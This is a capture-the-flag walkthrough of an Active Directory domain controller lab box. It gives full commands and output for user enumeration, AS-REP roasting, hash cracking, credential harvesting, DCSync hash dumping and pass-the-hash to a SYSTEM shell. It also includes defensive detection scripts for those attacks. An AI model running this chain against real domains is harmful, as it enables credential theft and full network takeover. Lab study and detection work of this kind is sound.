nmap -A -T4 10.10.10.175

Nmap scan report for 10.10.10.175
Host is up (0.39s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-12-27 12:35:38Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|phone
Running: Linux 2.4.X|2.6.X, Sony Ericsson embedded OS
CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:sonyericsson:u8i_vivaz
OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22), Sony Ericsson U8i Vivaz mobile phone
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 ... 30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 200.45 seconds

The scan shows a domain controller (DNS, Kerberos, LDAP on 389/3268, domain EGOTISTICAL-BANK.LOCAL, hostname SAUNA) that also serves a website on port 80. The OS fingerprint (Tomato / Sony Ericsson) is noise: nmap itself warns that the OSScan result is unreliable because it found no closed port, and the Service Info line already says Windows. Plan: check the SMB shares, look at the website, and use windapsearch to test whether LDAP allows anonymous bind; CVEs are not considered for now.
dirsearch -u 10.10.10.175

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/kali/.dirsearch/reports/10.10.10.175_22-12-28_09-36-30.txt
Error Log: /home/kali/.dirsearch/logs/errors-22-12-28_09-36-30.log
Target: http://10.10.10.175/

[09:36:33] Starting:
[09:36:40] 403 - 312B - /%2e%2e//google.com
[09:38:28] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[09:38:36] 200 - 30KB - /about.html
[09:39:55] 200 - 15KB - /contact.html
[09:40:01] 301 - 147B - /css -> http://10.10.10.175/css/
[09:40:24] 301 - 149B - /fonts -> http://10.10.10.175/fonts/
[09:40:40] 301 - 150B - /images -> http://10.10.10.175/images/
[09:40:40] 403 - 1KB - /images/
[09:40:47] 200 - 32KB - /index.html

Task Completed

Browsing the site shows a page that introduces the team members by name.
smbclient -L \\\\10.10.10.175 -N
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Anonymous login works, but no shares are listed.
Install windapsearch (https://github.com/Mephostophiles/windapsearch):

pip install python-ldap    # or: apt-get install python-ldap

If installing python-ldap fails, install the build dependencies first:

apt-get update
apt-get install libsasl2-dev python3-dev libldap2-dev libssl-dev

Then try an anonymous bind and user enumeration:

python3 windapsearch.py -d egotistical-bank.local --dc-ip 10.10.10.175 -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.175
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=EGOTISTICAL-BANK,DC=LOCAL
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Enumerating all AD users
[*] Bye!

Anonymous bind fails to yield anything: the tool binds as None and the user enumeration returns no entries.
The website lists the team members, so the next step is to build candidate usernames from those names with Username Anarchy and test them against the domain.

Download: https://github.com/urbanadventurer/username-anarchy

Contents of the name file:
Fergus Smith
Shaun Coins
Hugo Bear
Bowie Taylor
Steven Kerb

Command:
./username-anarchy --input-file /home/kali/桌面/Suan/name --select-format first,flast,first.last,firstl > uname.txt

Generated uname.txt:
fergus
fergus.smith
ferguss
fsmith
shaun
shaun.coins
shaunc
scoins
hugo
hugo.bear
hugob
hbear
bowie
bowie.taylor
bowiet
btaylor
steven
steven.kerb
stevenk
skerb
Command (GetNPUsers.py from impacket, one attempt per candidate name, domain taken from the nmap output):

while read p; do python3 GetNPUsers.py egotistical-bank.local/"$p" -request -no-pass -dc-ip 10.10.10.175 >> hash.txt; done < /home/kali/桌面/AD/username-anarchy-master/uname.txt

hash.txt (result; the impacket banner is repeated before every attempt and is shown once here):

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Getting TGT for fergus
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[*] Getting TGT for fergus.smith
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[*] Getting TGT for ferguss
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[*] Getting TGT for fsmith
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:c879c201ffc6450da458df490d972758$...
[*] Getting TGT for shaun
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[*] Getting TGT for shaun.coins
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[*] Getting TGT for shaunc
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[*] Getting TGT for scoins
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[*] Getting TGT for hugo
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[*] Getting TGT for hugo.bear
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[*] Getting TGT for hugob
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[*] Getting TGT for hbear
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[*] Getting TGT for bowie
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[*] Getting TGT for bowie.taylor
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[*] Getting TGT for bowiet
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[*] Getting TGT for btaylor
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[*] Getting TGT for steven
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[*] Getting TGT for steven.kerb
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[*] Getting TGT for stevenk
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[*] Getting TGT for skerb
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

Only fsmith returns an AS-REP hash. The KDC answers KDC_ERR_C_PRINCIPAL_UNKNOWN for every other name, so those accounts do not exist; fsmith exists and has Kerberos pre-authentication disabled, which is what lets the KDC hand out the encrypted AS-REP without a password.
Crack the hash with hashcat mode 18200; this is the AS-REP Roasting attack.

hashcat --help | grep Kerberos
  19600 | Kerberos 5, etype 17, TGS-REP         | Network Protocol
  19800 | Kerberos 5, etype 17, Pre-Auth        | Network Protocol
  19700 | Kerberos 5, etype 18, TGS-REP         | Network Protocol
  19900 | Kerberos 5, etype 18, Pre-Auth        | Network Protocol
   7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocol
  13100 | Kerberos 5, etype 23, TGS-REP         | Network Protocol
  18200 | Kerberos 5, etype 23, AS-REP          | Network Protocol

The $23$ in the hash is the encryption type (etype 23, RC4-HMAC) and the message is an AS-REP, so the matching mode is 18200.

hash.txt:
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:c879c201ffc6450da458df490d972758$...

Command:
hashcat -m 18200 hash.txt -o pass.txt /usr/share/wordlists/rockyou.txt --force

pass.txt:
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:c879c201ffc6450da458df490d972758$6253b915d0d5f2fa1a46bee89cbd29b4a862d61c9384b23b4dd2b0dc17a399b33b12b34e18708401337002de7b8c9dbb77c622e11f7b8ee4d7af04a4973e4455a74fe0bad5127523c1169f05f5bb2c2e30f60f47ab452872b59428dad9f1b4eca6f059e25f210267d531048ae9ec433512c0f9a22dcf4d91a14fc6ee4a0d3a2393d31234c3cf89ee6a26a62421b914ea94dd47468a66c6e861ed091e5f67693e6c713240200fb736780825f1ffeb996ca4c215ee46c89768bb9c67eef173eb7a6de344ad97aa9cccb9691999d13d05fcf856074bcf8f391a9433f7de5dc355ad80016362c6e3b88cd7ac12e548fe4bcadf09a296367c063d27553a91c13a0e9c:Thestrokes23

Password obtained: Thestrokes23
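From the defender's side, the two steps above (guessing names against the KDC, then pulling an AS-REP for the one account without pre-authentication) both land in Security event 4768 on the domain controller. The following is an added example, not part of the writeup: it runs two detection rules over constructed 4768 records (field names follow the real event; the source IP 10.10.14.5 and every line are made up for illustration).

```python
import re
from collections import defaultdict

# Constructed Security event 4768 (Kerberos TGT request) records; not logs
# from the box. Status 0x6 is KDC_ERR_C_PRINCIPAL_UNKNOWN (the answer every
# wrong guess got above); Status 0x0 means a TGT was actually issued.
SAMPLE_4768 = """\
TargetUserName=fergus PreAuthType=- TicketEncryptionType=0xFFFFFFFF Status=0x6 IpAddress=10.10.14.5
TargetUserName=fergus.smith PreAuthType=- TicketEncryptionType=0xFFFFFFFF Status=0x6 IpAddress=10.10.14.5
TargetUserName=ferguss PreAuthType=- TicketEncryptionType=0xFFFFFFFF Status=0x6 IpAddress=10.10.14.5
TargetUserName=fsmith PreAuthType=0 TicketEncryptionType=0x17 Status=0x0 IpAddress=10.10.14.5
TargetUserName=hsmith PreAuthType=2 TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.10.50
TargetUserName=SAUNA$ PreAuthType=2 TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.10.175
"""

FIELD = re.compile(r"(\w+)=(\S+)")


def parse_4768(text):
    """Turn each 'key=value key=value' line into a dict."""
    return [dict(FIELD.findall(line)) for line in text.splitlines() if line.strip()]


def asrep_roast_requests(events):
    """AS-REP roasting signature: a TGT issued (Status 0x0) with no
    pre-authentication (PreAuthType 0) and RC4 (etype 0x17), exactly the
    combination that yields a $krb5asrep$23$ hash for offline cracking."""
    return [(e["TargetUserName"], e["IpAddress"]) for e in events
            if e.get("Status") == "0x0" and e.get("PreAuthType") == "0"
            and e.get("TicketEncryptionType", "").lower() == "0x17"]


def enumeration_sources(events, threshold=3):
    """Username enumeration signature: one client IP collecting
    KDC_ERR_C_PRINCIPAL_UNKNOWN (0x6) answers for many distinct names."""
    unknown = defaultdict(set)
    for e in events:
        if e.get("Status") == "0x6":
            unknown[e["IpAddress"]].add(e["TargetUserName"])
    return {ip: len(names) for ip, names in unknown.items() if len(names) >= threshold}


if __name__ == "__main__":
    evs = parse_4768(SAMPLE_4768)
    print("AS-REP roast candidates:", asrep_roast_requests(evs))  # [('fsmith', '10.10.14.5')]
    print("enumeration sources:", enumeration_sources(evs))       # {'10.10.14.5': 3}
```

The fix that removes the first finding entirely is to clear "Do not require Kerberos preauthentication" on the account; the second rule is a threshold and should be tuned to the environment's normal rate of mistyped logons.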
Command: evil-winrm -i 10.10.10.175 -u fsmith -p 'Thestrokes23'
User flag: cat C:\Users\FSmith\Desktop\user.txt

Next, run winPEAS for automated privilege-escalation enumeration.
Download: https://github.com/carlospolop/PEASS-ng

In the evil-winrm shell, upload and run it:
upload /home/kali/Suan/winPEASany.exe
.\winPEASany.exe

Relevant output (terminal colour codes stripped):

Home folders found
    C:\Users\Administrator
    C:\Users\All Users
    C:\Users\Default
    C:\Users\Default User
    C:\Users\FSmith : FSmith [AllAccess]
    C:\Users\Public
    C:\Users\svc_loanmgr

Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName : EGOTISTICALBANK
    DefaultUserName   : EGOTISTICALBANK\svc_loanmanager
    DefaultPassword   : Moneymakestheworldgoround!

Password Policies
  Check for a possible brute-force
    Domain:                Builtin
    SID:                   S-1-5-32
    MaxPasswordAge:        42.22:47:31.7437440
    MinPasswordAge:        00:00:00
    MinPasswordLength:     0
    PasswordHistoryLength: 0
    PasswordProperties:    0

A stored AutoLogon credential is found: user svc_loanmanager, password Moneymakestheworldgoround!. Note that the AutoLogon entry says svc_loanmanager while the home-folder listing shows svc_loanmgr; the password belongs to the svc_loanmgr account, which is the name used to log in.

Log in as that account:
evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
evil-winrm shell:
upload /home/kali/temp/SharpHound.exe
./SharpHound.exe -c all
Install BloodHound:
pip install pycrypto          # dependency
pip install bloodhound        # the Python collector
apt install bloodhound        # BloodHound itself
sudo apt install default-jre  # latest Java, optional
Start BloodHound:
neo4j start
http://localhost:7474
Default credentials: neo4j/neo4j
Launch BloodHound from the Kali tools menu.
Run the prebuilt query "Find Principals with DCSync Rights": svc_loanmgr holds the replication rights needed for a DCSync attack.
Command 1 (dump everything):
python3 secretsdump.py svc_loanmgr@10.10.10.175

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:198e4852fcc60c3adf1749d69e2fdd24:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:932378bcf41465a18bd8d962d3d3540f2b1ef055a7607a802134070b068ca61d
SAUNA$:aes128-cts-hmac-sha1-96:b3860c7da6be8d0e8058f32cf7b9f13b
SAUNA$:des-cbc-md5:b926fb9e850e753b
[*] Cleaning up...

Command 2 (only the Administrator account):
python3 secretsdump.py egotistical-bank.local/svc_loanmgr@10.10.10.175 -just-dc-user Administrator

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
[*] Cleaning up...

Either command returns the Administrator hash. The rpc_s_access_denied line from command 1 is expected: svc_loanmgr is not a local administrator on the DC, so the remote-registry path fails, and secretsdump falls back to the DRSUAPI replication method, which works because of the DCSync rights BloodHound identified. Also note that HSmith and FSmith share the same NT hash, i.e. the same password.
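The replication request that secretsdump issued is auditable: with "Audit Directory Service Access" enabled, each DCSync shows up as Security event 4662 on the domain object with the replication extended rights in the Properties field. The following detection is an added example, not code from the writeup; the 4662 records are constructed (the field names follow the real event, and the last line uses a placeholder GUID), and the set of domain controller accounts is supplied by the caller.

```python
import re
from collections import defaultdict

# Extended-right GUIDs that a DRSUAPI replication request (what secretsdump
# used above) exercises on the domain object.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed Security event 4662 records, not logs from the box. AccessMask
# 0x100 is "Control Access" (an extended right); the third line is an
# ordinary attribute read with a placeholder GUID and must not be flagged.
SAMPLE_4662 = """\
SubjectUserName=SAUNA$ ObjectType=domainDNS AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
SubjectUserName=svc_loanmgr ObjectType=domainDNS AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
SubjectUserName=hsmith ObjectType=user AccessMask=0x10 Properties={00000000-0000-0000-0000-000000000bad}
"""

FIELD = re.compile(r"(\w+)=(\S+)")
GUID = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)


def parse_4662(text):
    """Turn each 'key=value key=value' line into a dict."""
    return [dict(FIELD.findall(line)) for line in text.splitlines() if line.strip()]


def dcsync_suspects(events, dc_accounts):
    """Replication rights exercised by anything other than a domain
    controller's computer account. DCs replicate with each other all the
    time; a user or service account doing it is DCSync."""
    allowed = {a.upper() for a in dc_accounts}
    hits = defaultdict(set)
    for e in events:
        if e.get("AccessMask") != "0x100":
            continue
        rights = {REPL_RIGHTS[g.lower()] for g in GUID.findall(e.get("Properties", ""))
                  if g.lower() in REPL_RIGHTS}
        if rights and e.get("SubjectUserName", "").upper() not in allowed:
            hits[e["SubjectUserName"]] |= rights
    return {subject: sorted(r) for subject, r in hits.items()}


if __name__ == "__main__":
    # SAUNA$ is the DC's own account, so only svc_loanmgr is reported.
    print(dcsync_suspects(parse_4662(SAMPLE_4662), dc_accounts={"SAUNA$"}))
```

The matching mitigation is to remove the replication rights from svc_loanmgr on the domain object; the same BloodHound query used above shows whether any non-DC principal still holds them.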
Use impacket/examples/psexec.py with the Administrator hash (pass-the-hash):

Command 1:
python3 psexec.py egotistical-bank.local/administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e

Command 2:
python3 psexec.py administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e

Both commands work:

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file KxkWXTww.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service gHaE on 10.10.10.175.....
[*] Starting service gHaE.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

System flag: type C:\Users\Administrator\Desktop\root.txt
Summary: the nmap scan shows the target is a domain controller with port 80 open. LDAP anonymous bind gives nothing. A dirsearch scan of the website finds an about/contact page listing the team, so Username Anarchy generates candidate usernames from those names, and GetNPUsers tests them against the domain name taken from nmap; fsmith comes back with an AS-REP hash, which hashcat cracks to the password. evil-winrm gives a shell as fsmith; winPEAS finds AutoLogon credentials for svc_loanmgr. BloodHound shows svc_loanmgr has DCSync rights, secretsdump performs the DCSync and returns the Administrator NT hash, and psexec with that hash (pass-the-hash) gives a SYSTEM shell.

Tools:
nmap
dirsearch
smbclient
windapsearch
GetNPUsers (impacket)
hashcat
evil-winrm
BloodHound
secretsdump (impacket)
psexec (impacket)